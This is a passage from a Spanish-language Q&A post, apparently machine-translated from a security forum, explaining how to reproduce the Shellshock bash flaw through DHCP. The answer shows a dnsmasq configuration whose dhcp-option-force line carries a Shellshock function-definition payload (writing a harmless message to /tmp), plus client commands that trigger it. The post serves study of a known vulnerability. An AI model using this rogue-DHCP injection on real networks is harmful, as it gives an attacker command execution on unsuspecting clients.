Un atacante puede explotar el error de bash en el protocolo DHCP. En la búsqueda, cómo se puede realizar esto, encontré " enlace ", pero no se pudo encontrar ningún tutorial que lo muestre en la máquina Linux.
Explique cómo se puede utilizar para atacar a los clientes que utilizan el servidor dhcp en Linux. ¿Qué configuraciones deben hacerse en el servidor dhcp?
Para reproducir esta vulnerabilidad en los sistemas * nix, siga estos pasos:
Instala dnsmasq. En la máquina Ubuntu se puede hacer ejecutando el siguiente comando:
sudo apt-get install dnsmasq
Agregue las siguientes líneas al archivo de configuración /etc/dnsmasq.conf :
interface="iface_server"
dhcp-range="ip_start","ip_end",12h
dhcp-option-force=100,() { :; }; echo 'You are going to be shocked..ShellShock !!!'>/tmp/
El código vulnerable se insertará en el campo dhcp-option del encabezado.
¿Dónde está la interfaz de red? El servidor DHCP escuchará, y ip_start , ip_end es el rango de direcciones IP que dará el servidor.
En la máquina de destino, verifique que una interfaz esté configurada para usar el cliente DHCP. Se puede hacer mirando el / etc / network / interfaces file .
Las siguientes líneas deben estar en el archivo:
auto "iface_client"
iface "iface_client" inet dhcp
En la máquina vulnerable, ingrese el siguiente comando:
sudo ifdown "iface_client" && sudo ifup "iface_client"
Donde iface_client es la interfaz de red, el cliente DHCP adquirirá la dirección IP para.
Tenga en cuenta que iface_server y iface_client deben estar conectados a la misma red.
Lea otras preguntas en las etiquetas bash shellshock dhcp